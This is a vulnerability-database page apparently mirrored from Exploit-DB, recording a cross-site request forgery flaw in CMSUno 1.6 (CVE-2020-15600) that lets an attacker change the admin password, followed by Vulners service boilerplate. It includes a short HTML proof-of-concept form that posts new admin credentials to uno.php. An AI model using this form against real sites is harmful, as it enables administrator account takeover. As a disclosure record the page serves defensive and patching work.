Lucene search
+L

CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)

🗓️ 17 Jul 2020 00:00:00Reported by NothType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 849 Views

CMSUno v1.6 Cross-Site Request Forger

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password) Vulnerability
17 Jul 202000:00
–zdt
cnvd
CNVD
CMSUno Cross-Site Request Forgery Vulnerability
8 Jul 202000:00
–cnvd
cve
CVE
CVE-2020-15600
7 Jul 202021:17
–cve
cvelist
Cvelist
CVE-2020-15600
7 Jul 202021:17
–cvelist
euvd
EUVD
EUVD-2020-7587
7 Oct 202500:30
–euvd
nvd
NVD
CVE-2020-15600
7 Jul 202022:15
–nvd
packetstorm
Packet Storm
CMSUno 1.6 Cross Site Request Forgery
17 Jul 202000:00
–packetstorm
prion
Prion
Cross site request forgery (csrf)
7 Jul 202022:15
–prion
redhatcve
RedhatCVE
CVE-2020-15600
22 May 202515:14
–redhatcve
# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Date: 2020-05-31
# Exploit Author: Noth
# Vendor Homepage: https://github.com/boiteasite/cmsuno
# Software Link: https://github.com/boiteasite/cmsuno
# Version: v1.6
# CVE : 2020-15600

An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.

PoC :

<html>
<body>
<script>history.pushState(",",'/')</script>
<form action=“http://127.0.0.1/cmsuno-master/uno.php”method=“POST”>
<input type=“hidden” name=“user” value=“admin”/>
<input type=“hidden” name=“pass” value=“yourpassword”/>
<input type=“submit” name=“user” value=“Submit request”/>
</form>
</body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Jul 2020 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 3.16.5
EPSS0.01899
849